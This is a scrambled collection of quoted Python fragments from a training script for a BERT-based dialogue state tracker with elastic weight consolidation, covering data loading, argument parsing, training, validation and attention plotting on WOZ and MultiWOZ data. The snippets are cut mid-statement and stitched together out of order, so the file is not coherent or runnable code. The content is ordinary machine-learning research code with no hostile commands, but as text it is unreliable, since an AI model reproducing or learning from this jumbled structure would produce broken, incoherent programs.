def get_label_embedding(labels, max_seq_length, tokenizer, device): features = [] for label in labels:", "= os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as writer: for dialog in incorrect_dialogs: for", "+ present target slots] slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids,", "slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'),", "tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, prev_label_ids = batch if input_ids.dim()", "f: reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines = [] for line in reader:", "self.label_id = label_id self.prev_label_id = prev_label_id # trained slots in previous tasks class", "/ nb_dev_examples prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples if summary_writer is not None: summary_writer.add_scalar(\"Validate/Loss\",", "%s\" % \" \".join([str(x) for x in tokens])) logger.info(\"input_ids: %s\" % \" \".join([str(x)", "prev_label = [ line[4+idx] for idx in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label,", "['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params': [p for n, p in param_optimizer", "print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig == True: #if (len(incorrect_dialogs)", "\"\"\"A single training/test example for simple sequence classification.\"\"\" def __init__(self, guid, text_a, text_b=None,", "attention\") parser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run training.\") parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to run eval", "!= -1: t_total = t_total // torch.distributed.get_world_size() if args.fp16: try: from apex.optimizers import", "sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum", "'weight_decay': 0.01, 'lr': args.learning_rate}, {'params': [p for n, p in param_optimizer if any(nd", "enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file =", "prev_turn_idx - 1) assert len(features) % max_turn_length == 0 if prev_dialogue_idx is None", "list of labels for this data set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file,", "Batch size = %d\", args.train_batch_size) logger.info(\" Num steps = %d\", num_train_steps) all_input_ids, all_input_len,", "all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev,", "device, n_gpu, bool(args.local_rank != -1), args.fp16)) if args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid gradient_accumulation_steps", "= int(len(train_examples) / args.train_batch_size * args.num_train_epochs) num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs)", "BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt type should be either rnn or transformer')", "'eval_acc_slot':'\\t'.join([ str((val).item()) for val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val /", "guid self.text_a = text_a self.text_b = text_b self.label = label # Target slots", "encoding='utf-8') as f: reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines = [] for line", "torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu = 1 # Initializes the", "0 for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2:", "loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if n_gpu == 1: for i, slot in", "labels in label_list] for i, label in enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info", "in enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s (id = %d) '", "= ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else: raise NotImplementedError() # sorting the ontology according", "of data.\"\"\" def __init__(self, input_ids, input_len, label_id, prev_label_id): self.input_ids = input_ids self.input_len =", "in self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in", "features of data.\"\"\" def __init__(self, input_ids, input_len, label_id, prev_label_id): self.input_ids = input_ids self.input_len", "slot in ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology", "return x / warmup return 1.0 - x ############################################################################### # Main ############################################################################### def", "of training epochs to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number of epochs to", "raise ValueError(\"At least one of `do_train` or `do_eval` must be True.\") ############################################################################### #", "for l in loss_slot] else: for i, l in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i]", "label_ids, prev_label_ids = batch if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len =", "prev_num_valid_turn else: for i, l in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] + l *", "input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss_ + args.lambda_ewc * ewc.penalty(model) prev_loss, prev_loss_slot,", "of RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden of rnns zero\") parser.add_argument('--skip_connect', type=str,", "acc_slot = acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc", "= line[3] + \" # \" + text_b else: text_a = line[2] #", "class_count = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))] eval_examples =", "# in the case that slot and values are different between the training", "training on gpus\") parser.add_argument('--seed', type=int, default=42, help=\"random seed for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1,", "dev_loss best_acc = dev_acc logger.info(\"*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\"", "= None, None nb_eval_examples_prev = 0 for input_ids, input_len, label_ids, prev_label_ids in tqdm(eval_dataloader,", "% args.gradient_accumulation_steps == 0: # modify learning rate with special warm up BERT", "features.append((label_token_ids, label_len)) all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1]", "for i, l in enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l * prev_num_valid_turn prev_dev_acc_slot", "processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs)", "if ('slot_lookup' in key) or ('value_lookup' in key): # remove slot_lookup and value_lookup", "= prev_label # trained slots in previous tasks class InputFeatures(object): \"\"\"A single set", "= prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) > -1,", "be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total input sequence length after WordPiece", "belief tracking dataset (GLUE version).\"\"\" def __init__(self, config): super(Processor, self).__init__() import json if", "i in range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples,", "label_token_ids.append(token_ids) label_len.append(lens) ## Get slot-type embeddings ## Note: slot embeddings are ordered as", "empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging if", "size = %d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) # Run prediction", "self).__init__() import json if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"),", "[ l * nb_eval_ex for l in loss_slot] else: for i, l in", "(len(incorrect_dialogs) < attention_draw): max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for", "slot_len) if args.local_rank != -1: try: from apex.parallel import DistributedDataParallel as DDP except", "n_gpu == 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples,", "for x in range(num_labels[i])] for i in range(len(num_labels))] class_count = [[0 for x", "parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss scaling to improve fp16 numeric stability. Only used when", "[x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_a)] tokens_b =", "DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer from pytorch_pretrained_bert.optimization", "Load pretrained model # in the case that slot and values are different", "warmup=0.002): if x < warmup: return x / warmup return 1.0 - x", "\"pytorch_model.bin\") # Load a trained model that you have fine-tuned ptr_model = torch.load(output_model_file,", "input turn length. \\n\" \"Sequences longer than this will be truncated, and sequences", "eval_acc_slot = None, None nb_eval_steps, nb_eval_examples = 0, 0 prev_eval_loss, prev_eval_accuracy = 0,", "lr_this_step = args.learning_rate * warmup_linear(global_step / t_total, args.warmup_proportion) if summary_writer is not None:", "+=1 drawfig = False print('hotel') print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10,", "ptr_model = torch.load(args.load_path, map_location=device) del_list = [] rename_list = [] for key in", "args.local_rank != -1: try: from apex.parallel import DistributedDataParallel as DDP except ImportError: raise", "for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else: # Account for", "from apex.optimizers import FusedAdam except ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex", "excluding slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn',", "% slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i], global_step) tr_loss +=", "examples = %d\", len(eval_examples)) logger.info(\" Batch size = %d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids,", "[] nlabels = 0 for sid, slot in enumerate(class_count): slot_class_acc = 0 for", "label_info = '' label_map = [{_label: i for i, _label in enumerate(labels)} for", "features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len", "self.guid = guid self.text_a = text_a self.text_b = text_b self.label = label #", "help=\"set initial hidden of rnns zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head', type=int, default=4,", "action='store_true', help=\"Whether to run eval on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to", "= ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params': [p for n, p in", "= loss_ + args.lambda_ewc * loss_ewc prev_loss, _, prev_acc, prev_acc_slot, _ = model(input_ids,", "n_gpu == 1: torch.save(model.state_dict(), output_model_file) else: torch.save(model.module.state_dict(), output_model_file) last_update = epoch best_loss =", "processor.prev_slot_idx #target_slot_id = processor.target_slot_idx # wrong prev_slot_id = list(range(0, len(processor.prev_slot))) # List of", "enumerate(ontology_items): slot, value = domain if slot == \"pricerange\": slot = \"price range\"", "x, y, ax): seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct =", "on validation dataset model.eval() dev_loss = 0 dev_acc = 0 dev_loss_slot, dev_acc_slot =", "model.named_parameters() if p.requires_grad] no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params': [p", "step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device) for t in batch) input_ids,", "All slot value labels num_labels = [len(labels) for labels in label_list] # Number", "#### EWC: calculate Fisher ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for", "reader: if len(line) > 0 and line[0][0] == '#': # ignore comments (starting", "ontology = json.load(fp_ontology) ontology = ontology[\"informable\"] del ontology[\"request\"] for slot in ontology.keys(): ontology[slot].append(\"do", "help=\"Whether to use 16-bit float precision instead of 32-bit\") parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss", "dimension used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of RNN layers\") parser.add_argument('--zero_init_rnn',", "## Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total input sequence length after", "in ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology =", "EWC model = BeliefTracker(args, num_labels, device) if args.fp16: model.half() # Load pretrained model", "processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not acc ==", "truncated, and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument('--hidden_dim', type=int, default=100,", "label_id, prev_label_id): self.input_ids = input_ids self.input_len = input_len self.label_id = label_id self.prev_label_id =", "[] for label in labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids", "`do_train` or `do_eval` must be True.\") ############################################################################### # Load data ############################################################################### # Get", "labels num_labels = [len(labels) for labels in label_list] # Number of labels of", "1: model = torch.nn.DataParallel(model) # Prepare optimizer if args.do_train: def get_optimizer_grouped_parameters(model): param_optimizer =", "i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace('", "print('hotel') print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1))", "* prev_num_valid_turn if n_gpu == 1: if dev_loss_slot is None: dev_loss_slot = [", "when available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for distributed training on gpus\") parser.add_argument('--seed', type=int,", "args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s label: %s pred: %s\" % (turn, processor.target_slot[slot],", "sid, slot in enumerate(class_count): slot_class_acc = 0 for vid, value in enumerate(slot): if", "line) in enumerate(lines): guid = \"%s-%s-%s\" % (set_type, line[0], line[1]) # line[0]: dialogue", "is None: # for multi-gpu eval_loss_slot = [0] prev_eval_loss_slot = [0] eval_accuracy =", "else: torch.save(model.module.state_dict(), output_model_file) last_update = epoch best_loss = dev_loss best_acc = dev_acc logger.info(\"***", "i, l in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn dev_acc_slot +=", "tokens_b, max_length): \"\"\"Truncates a sequence pair in place to the maximum length.\"\"\" while", "args.dev_batch_size) logger.info(\" Num steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\", "enumerate(lines): guid = \"%s-%s-%s\" % (set_type, line[0], line[1]) # line[0]: dialogue index, line[1]:", "rename rnn -> nbt, rename_list.append(key) for key in del_list: del ptr_model[key] for key", "len(features) % max_turn_length == 0 if prev_dialogue_idx is None or prev_turn_idx < max_turn_length:", "None: eval_acc_slot = acc_slot * nb_eval_ex else: eval_acc_slot += acc_slot * nb_eval_ex return", "label: %s pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs),", "for step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device) for t in batch)", "text = {} text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label'] = [str(label_list[idx][x]) for", "config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology) ontology = ontology[\"informable\"] del", "ValueError('nbt type should be either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC model", "dev_acc)) #if epoch > 100 and last_update + args.patience <= epoch: if last_update", "\\n\" \"than this will be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total input", "args.local_rank != -1: t_total = t_total // torch.distributed.get_world_size() if args.fp16: try: from apex.optimizers", "and not args.do_analyze: raise ValueError(\"At least one of `do_train` or `do_eval` must be", "x < warmup: return x / warmup return 1.0 - x ############################################################################### #", "args.local_rank == -1: train_sampler = RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data) train_dataloader = DataLoader(train_data,", "for key in rename_list: new_key = key.replace('rnn.', 'nbt.') ptr_model[new_key] = ptr_model[key] del ptr_model[key]", "text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label'] = [str(label_list[idx][x]) for idx, x in", "main(): parser = argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location of the", "[] prev_dialogue_idx = None all_padding = [0] * max_seq_length all_padding_len = [0, 0]", "symbol '#' will be replaced with '[SEP]' after tokenization. text_a = line[2] +", "enumerate(class_count): slot_class_acc = 0 for vid, value in enumerate(slot): if not value ==", "DDP(model) elif n_gpu > 1: model = torch.nn.DataParallel(model) # Prepare optimizer if args.do_train:", "eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy = 0, 0 eval_loss_slot, eval_acc_slot", "import torch from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed import DistributedSampler", "training.\") optimizer = FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0) if args.loss_scale == 0: optimizer =", "= BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps = None accumulation = False if args.do_train: train_examples =", "directory name') parser.add_argument(\"--target_slot\", default='', type=str, required=True, help=\"Target slot idx to train model. ex.", "0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10,", "range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1 if label_ids[0][turn][slot] == pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig = False print('hotel') print(label_ids[0,", "+= label_padding assert len(label_token_ids) == max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids = torch.tensor([f[0] for f", "parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric for distance between label embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\",", "= DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy = 0, 0 eval_loss_slot, eval_acc_slot =", "examples def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length): \"\"\"Loads a data file into", "Processor(args) prev_label_list = processor.get_prev_labels() # Slot value labels of Previous task target_label_list =", "= loss.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _", "torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization import", "= turn['input'] + '\\t' for label, pred in zip(turn['label'], turn['pred']): text += '%s\\t%s\\t'%(label,", "val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item()) for val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy,", "\"- 2\" if len(tokens_a) > max_seq_length - 2: tokens_a = tokens_a[:(max_seq_length - 2)]", "evaluation ptr_model = torch.load(args.load_path, map_location=device) del_list = [] rename_list = [] for key", "backend which will take care of sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {} n_gpu: {},", "BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise ValueError('nbt type should be either rnn", "args.lambda_ewc * loss_ewc if args.gradient_accumulation_steps > 1: loss = loss / args.gradient_accumulation_steps if", "0, 0 prev_eval_loss_slot, prev_eval_acc_slot = None, None nb_eval_examples_prev = 0 for input_ids, input_len,", "train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size) ## Dev ## utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev", "parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total input sequence length after WordPiece tokenization. \\n\"", "\"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not acc == 1: dialog = [] for input,", "help=\"Proportion of training to perform linear learning rate warmup for. \" \"E.g., 0.1", "=[] prev_slot = [] for key, value in slot_idx.items(): if key == config.target_slot:", "return 'do not care' if label=='dontcare' else label def _get_label(label, label_list): label_id =", "response label = [ line[4+idx] for idx in self.target_slot_idx] prev_label = [ line[4+idx]", "[ line[4+idx] for idx in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return", "is valid only when using label embeddings. \\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric", "None: # for multi-gpu eval_loss_slot = [0] prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy", "% (epoch, dev_loss, dev_acc)) #if epoch > 100 and last_update + args.patience <=", "%s\\n\" % (key, str(result[key]))) ############################################################################### # Analyze: TODO ############################################################################### if args.do_analyze and (args.local_rank", "label_info) logger.info(\"previous label: \" + prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if", ") parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not train BERT utterance encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\",", "n_gpu, target_slot=target_slot_id) loss_ = loss_.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) loss_ewc =", "num_dev_steps = int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs) ## utterances all_input_ids, all_input_len, all_label_ids, all_prev_label_ids", "in batch) input_ids, input_len, label_ids, prev_label_ids = batch if input_ids.dim() == 2: input_ids", "prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss_, _, acc, acc_slot,", "trange import numpy as np import torch from torch.utils.data import TensorDataset, DataLoader, RandomSampler,", "for key in ptr_model.keys(): if ('slot_lookup' in key) or ('value_lookup' in key): #", "label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features) %", "global_step) for i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\"", "prev_nb_dev_examples prev_dev_acc = prev_dev_acc / prev_nb_dev_examples if n_gpu == 1: dev_acc_slot = dev_acc_slot", "+ l * nb_eval_ex if eval_acc_slot is None: eval_acc_slot = acc_slot * nb_eval_ex", "name') parser.add_argument(\"--target_slot\", default='', type=str, required=True, help=\"Target slot idx to train model. ex. '0:1:2", "= [x if x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a,", "slots in previous tasks class DataProcessor(object): \"\"\"Base class for data converters for sequence", "input_len, label_id, prev_label_id): self.input_ids = input_ids self.input_len = input_len self.label_id = label_id self.prev_label_id", "{}, should be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps) # Set", "/= nlabels for sid, slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc)) writer.write(\"total class", "torch.cuda.manual_seed_all(args.seed) if not args.do_train and not args.do_eval and not args.do_analyze: raise ValueError(\"At least", "%s label: %s pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir,", "= torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\") n_gpu = torch.cuda.device_count() else:", "torch.save(model.state_dict(), output_model_file) else: torch.save(model.module.state_dict(), output_model_file) last_update = epoch best_loss = dev_loss best_acc =", "< max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx = curr_turn_idx", "dev_loss = round(dev_loss, 6) if last_update is None or dev_loss < best_loss: #", "device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if args.local_rank != -1: try: from apex.parallel import", "Acc=%.6f ***\" % (last_update, best_loss, best_acc)) else: logger.info(\"*** Model NOT Updated: Epoch=%d, Validation", "text_b=text_b, label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length): \"\"\"Loads", "# tokenizer vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model) if not os.path.exists(vocab_dir): raise ValueError(\"Can't", "0 nb_tr_examples, nb_tr_steps = 0, 0 for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch", "= loss_ + args.lambda_ewc * loss_ewc else: loss_, _, acc, acc_slot, _ =", "== 0: # modify learning rate with special warm up BERT uses lr_this_step", "open(input_file, \"r\", encoding='utf-8') as f: reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines = []", "\"\"\"Processor for the belief tracking dataset (GLUE version).\"\"\" def __init__(self, config): super(Processor, self).__init__()", "args.do_train: raise ValueError(\"Output directory ({}) already exists and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True)", "in optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step() optimizer.zero_grad() global_step += 1 # Perform evaluation", "nb_eval_steps, nb_eval_examples = 0, 0 prev_eval_loss, prev_eval_accuracy = 0, 0 prev_eval_loss_slot, prev_eval_acc_slot =", "if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)] *", "[] for input, label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]): if label[0] == -1:", "dtype=torch.long).to(device) return all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a, tokens_b, max_length): \"\"\"Truncates a sequence pair in", "full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=args.eval_batch_size) model.eval() eval_loss, eval_accuracy", "enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch = tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, _", "prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss = prev_eval_loss / nb_eval_examples_prev", "idx, domain in enumerate(ontology_items): slot, value = domain if slot == \"pricerange\": slot", "get_test_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation) def", "`InputBatch`s.\"\"\" slot_dim = len(label_list) prev_slot_dim = len(prev_label_list) def _hard_coding_label(label): return 'do not care'", "prev_dev_loss_slot = [ l * prev_num_valid_turn for l in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot", "nb_tr_steps = 0, 0 for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch = tuple(t.to(device)", "label_len = [], [] for labels in label_list: token_ids, lens = get_label_embedding(labels, args.max_label_length,", "= prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss, loss_slot, acc, acc_slot, _", "Only used when fp16 set to True.\\n\" \"0 (default value): dynamic loss scaling.\\n\"", "'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for val in eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item()) for val in eval_acc_slot]),", "torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10,", "= processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs) num_dev_steps = int(len(dev_examples)", "global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) 